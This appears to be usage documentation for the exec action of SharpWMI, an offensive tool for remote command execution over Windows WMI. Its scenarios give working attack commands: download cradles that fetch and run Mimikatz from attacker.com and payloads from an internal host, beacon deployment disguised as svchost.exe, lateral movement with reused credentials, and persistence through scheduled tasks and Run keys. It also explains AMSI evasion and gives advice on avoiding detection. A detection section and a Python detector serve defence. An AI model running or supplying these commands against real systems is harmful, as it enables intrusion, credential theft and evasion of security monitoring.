
Overview

The exec action creates and executes processes on local and remote systems using the Win32_Process.Create WMI method. It supports command execution with optional output retrieval and AMSI evasion capabilities.
The exec action is one of the most powerful features in SharpWMI, enabling direct code execution on remote systems through native Windows management infrastructure.

Syntax

Basic Execution:
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="COMMAND" [username=DOMAIN\user] [password=Password]
With Output Retrieval:
SharpWMI.exe action=exec [computername=HOST[,HOST2,...]] command="COMMAND" result=true [amsi=disable] [username=DOMAIN\user] [password=Password]
The exec action can also be invoked using the action=execute or action=create aliases.

Parameters

Parameter     Required  Description
action        Yes       Must be exec, execute, or create
command       Yes       Command line to execute
computername  No        Target host(s), comma-separated. Defaults to localhost
result        No        Set to true to retrieve command output. Default: false
amsi          No        Set to disable to bypass AMSI (requires result=true)
username      No        Username for authentication (requires password)
password      No        Password for authentication (requires username)

Usage Examples

Basic Process Creation

SharpWMI.exe action=exec computername=target.domain.com command="notepad.exe"

Command Output Retrieval

Capture and display command output:
SharpWMI.exe action=exec computername=target.domain.com command="whoami" result=true

Example Output

[*] Host                           : target.domain.com
[*] Command                        : whoami
[*] User name                      : DOMAIN\user
[*] Creation of process returned   : 0
[*] Process ID                     : 5432
[+] Command result:

DOMAIN\user

Command Output Mechanism

When result=true is specified, SharpWMI uses a clever technique to retrieve command output:
  1. Command Wrapping: the command is wrapped in PowerShell that captures output and XOR-encodes it
  2. Environment Variable Storage: the encoded output is stored in a WMI environment variable with a random name
  3. Output Retrieval: SharpWMI queries the environment variable and decodes the output
  4. Cleanup: environment variables are automatically deleted after retrieval
The output retrieval mechanism:
  1. Creates a random XOR key
  2. Wraps your command in PowerShell: $o=(COMMAND | Out-String).Trim()
  3. XOR-encodes the output
  4. Stores in environment variable via Set-WmiInstance -Class Win32_Environment
  5. Retrieves and decodes the output
  6. Cleans up the environment variable
This technique was contributed by Evi1cg (@Ridter).

AMSI Evasion

When amsi=disable is specified (requires result=true), SharpWMI:
  1. Registry Modification: sets HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable to 0
  2. Command Execution: executes your command with AMSI disabled
  3. Registry Restoration: restores the original AMSI registry value
AMSI evasion requires administrative privileges and may be detected by EDR solutions. The registry modification is temporary and cleaned up after execution.
AMSI evasion code contributed by Steven Flores (0xthirteen) from SharpMove.

Operational Scenarios

Scenario 1: Initial Access and Beacon Deployment

# 1. Test connectivity with simple command
SharpWMI.exe action=exec computername=target.domain.com command="whoami" result=true

# 2. Upload beacon (using upload action)
SharpWMI.exe action=upload computername=target.domain.com source="beacon.exe" dest="C:\Windows\temp\svchost.exe" amsi=disable

# 3. Execute beacon
SharpWMI.exe action=exec computername=target.domain.com command="C:\Windows\temp\svchost.exe"

# 4. Verify execution
SharpWMI.exe action=ps computername=target.domain.com

Scenario 2: Credential Harvesting

# Execute Mimikatz with encoded command
SharpWMI.exe action=exec computername=dc.domain.com command="powershell.exe -enc <BASE64_MIMIKATZ>" result=true amsi=disable username="DOMAIN\admin" password="Password123!"

# Or download and execute from URL
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/Invoke-Mimikatz.ps1')\"" result=true amsi=disable

Scenario 3: Lateral Movement

# Execute across multiple systems
SharpWMI.exe action=exec computername=ws01,ws02,ws03,ws04,ws05 command="powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')\"" amsi=disable

# With credential reuse
SharpWMI.exe action=exec computername=server1,server2,server3 command="rundll32.exe payload.dll,EntryPoint" username="DOMAIN\admin" password="Password123!"

Scenario 4: Domain Reconnaissance

# Enumerate domain admins
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADGroupMember \"Domain Admins\" | Select Name'" result=true amsi=disable

# Find admin workstations
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADComputer -Filter {OperatingSystem -like \"*workstation*\"} | Select Name'" result=true amsi=disable

# Enumerate trusts
SharpWMI.exe action=exec computername=dc.domain.com command="powershell -c 'Get-ADTrust -Filter *'" result=true amsi=disable

Scenario 5: Persistence Mechanisms

# Create scheduled task
SharpWMI.exe action=exec computername=target.domain.com command="schtasks /create /tn \"WindowsUpdate\" /tr \"C:\Windows\temp\persist.exe\" /sc onlogon /ru SYSTEM" result=true

# Registry Run key
SharpWMI.exe action=exec computername=target.domain.com command="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d C:\Windows\temp\persist.exe" result=true

# WMI event subscription (using executevbs action is better)
SharpWMI.exe action=exec computername=target.domain.com command="powershell -c \"<WMI_SUBSCRIPTION_SCRIPT>\"" result=true amsi=disable

Remote vs Local Usage

Local Execution

When to use:
  • Post-exploitation on compromised system
  • Testing commands before remote execution
  • Local privilege escalation
Advantages:
  • No network traffic
  • No authentication required
  • Faster execution
SharpWMI.exe action=exec command="cmd.exe /c whoami"

Command Line Best Practices

Quote Handling

Use proper escaping for complex commands:
# Good
command="powershell -c \"Get-Process\""

# Bad (quotes not escaped)
command="powershell -c "Get-Process""

Encoded Commands

Base64 encode complex PowerShell:
# Encode locally
$command = 'Get-Process; whoami'
$bytes = [Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)

# Execute
SharpWMI.exe action=exec command="powershell -enc $encoded"

Detection Considerations

Win32_Process.Create is a high-fidelity indicator of remote code execution and is heavily monitored in mature environments.
  • Event ID 4688: Process creation events
  • Event ID 4648: Logon with explicit credentials
  • Sysmon Event ID 1: Process creation
  • Parent process: wmiprvse.exe (WMI Provider Host)
  • Unusual process trees (wmiprvse.exe → cmd.exe → powershell.exe)
  • Event ID 5857: WMI activity
  • Event ID 5860-5861: WMI event consumers
  • Sysmon Event ID 19-21: WMI activity
  • Registry modifications for AMSI evasion
  • Creation/deletion of environment variables
  • DCOM traffic on port 135
  • Dynamic RPC connections
  • Multiple WMI connections from single source
  • WMI traffic to sensitive systems (DCs, servers)
  • Suspicious command-line arguments
  • Base64 encoded commands
  • Web requests in command line
  • Credential dumping tools (mimikatz, etc.)
  • PowerShell download cradles
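The following Python is an added example, not code from SharpWMI or its documentation. It applies the indicators listed above (and the result=true output mechanism described earlier) to a few constructed Sysmon-style events: a shell spawned by WmiPrvSE.exe, a base64 -enc command that is decoded before matching, a PowerShell download cradle, the Set-WmiInstance / Win32_Environment wrapper used for output retrieval, and a write to the AmsiEnable registry value. The event field names and sample values are assumptions made for the example.

```python
import base64
import re

# Constructed Sysmon-like sample telemetry (id 1 = process creation, id 13 = registry value set).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WMIPRVSE = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/x.ps1')"
SAMPLE_EVENTS = [
    {"id": 1, "parent": WMIPRVSE, "image": PS, "cmdline": "powershell -c \"$o=(whoami | Out-String).Trim();"
     " Set-WmiInstance -Class Win32_Environment -Arguments @{Name='QX7K';VariableValue=$o}\""},
    {"id": 1, "parent": WMIPRVSE, "image": PS,
     "cmdline": "powershell -enc " + base64.b64encode(CRADLE.encode("utf-16le")).decode()},
    {"id": 13, "image": PS,
     "target": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows Script\Settings\AmsiEnable"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]
SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_RE = re.compile(r"DownloadString|Invoke-Expression|\bIEX\b|WebClient", re.I)
AMSI_KEY = r"\software\microsoft\windows script\settings\amsienable"

def decode_encoded_command(cmdline):
    """Return the plaintext of a -enc/-encodedcommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    """Apply the indicators listed above to each event; returns (event index, reason) pairs."""
    findings = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:
            if ev["parent"].lower().endswith("wmiprvse.exe") and ev["image"].lower().endswith(SHELLS):
                findings.append((i, "shell spawned by WmiPrvSE.exe (Win32_Process.Create)"))
            cmd = ev["cmdline"]
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((i, "base64 -enc command"))
                cmd = decoded  # inspect the decoded script rather than the base64 blob
            if CRADLE_RE.search(cmd):
                findings.append((i, "PowerShell download cradle"))
            if re.search(r"Set-WmiInstance.*Win32_Environment", cmd, re.I):
                findings.append((i, "output staged in Win32_Environment (result=true wrapper)"))
        elif ev["id"] == 13 and ev["target"].lower().endswith(AMSI_KEY):
            findings.append((i, "AmsiEnable registry value modified (AMSI evasion)"))
    return findings
```

Running analyze(SAMPLE_EVENTS) flags the two WmiPrvSE-spawned shells and the registry write, and leaves the benign notepad.exe launch from explorer.exe untouched.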

Best Practices

Operational Security

  • Use AMSI evasion when executing PowerShell
  • Avoid obvious malicious command lines
  • Use encoded commands when possible
  • Clean up created processes/files
  • Limit use of result=true (creates artifacts)

Execution Strategy

  • Test commands locally before remote execution
  • Use short-lived processes
  • Consider process names that blend in
  • Stage payloads via upload action first
  • Monitor for command failures

Error Handling

  • Check return values (0 = success)
  • Verify process started successfully
  • Handle timeout scenarios
  • Account for AV/EDR blocking

Credential Management

  • Use minimal necessary privileges
  • Rotate credentials between operations
  • Avoid reusing domain admin credentials
  • Monitor for lockouts

Return Values

The Creation of process returned value indicates success or failure:
Return Value  Meaning
0             Successful completion
2             Access denied
3             Insufficient privilege
8             Unknown failure
9             Path not found
21            Invalid parameter

Troubleshooting

Cause: Insufficient privileges or security restrictions
Solution:
  • Verify admin credentials
  • Check UAC remote restrictions
  • Ensure user is in local Administrators group
  • Try with domain admin account
Cause: Executable or file path doesn’t exist
Solution:
  • Verify path exists on target system
  • Use full paths instead of relative
  • Upload executable first with upload action
  • Check for typos in command
Cause: Process doesn’t generate stdout or requires admin context
Solution:
  • Verify command produces output when run locally
  • Check if process requires elevated privileges
  • Try without result=true first
  • Increase timeout if process is slow
Cause: Insufficient privileges or EDR blocking
Solution:
  • Ensure you have admin rights
  • Verify registry modification succeeded
  • Try alternative AMSI bypass methods
  • Check for EDR blocking registry changes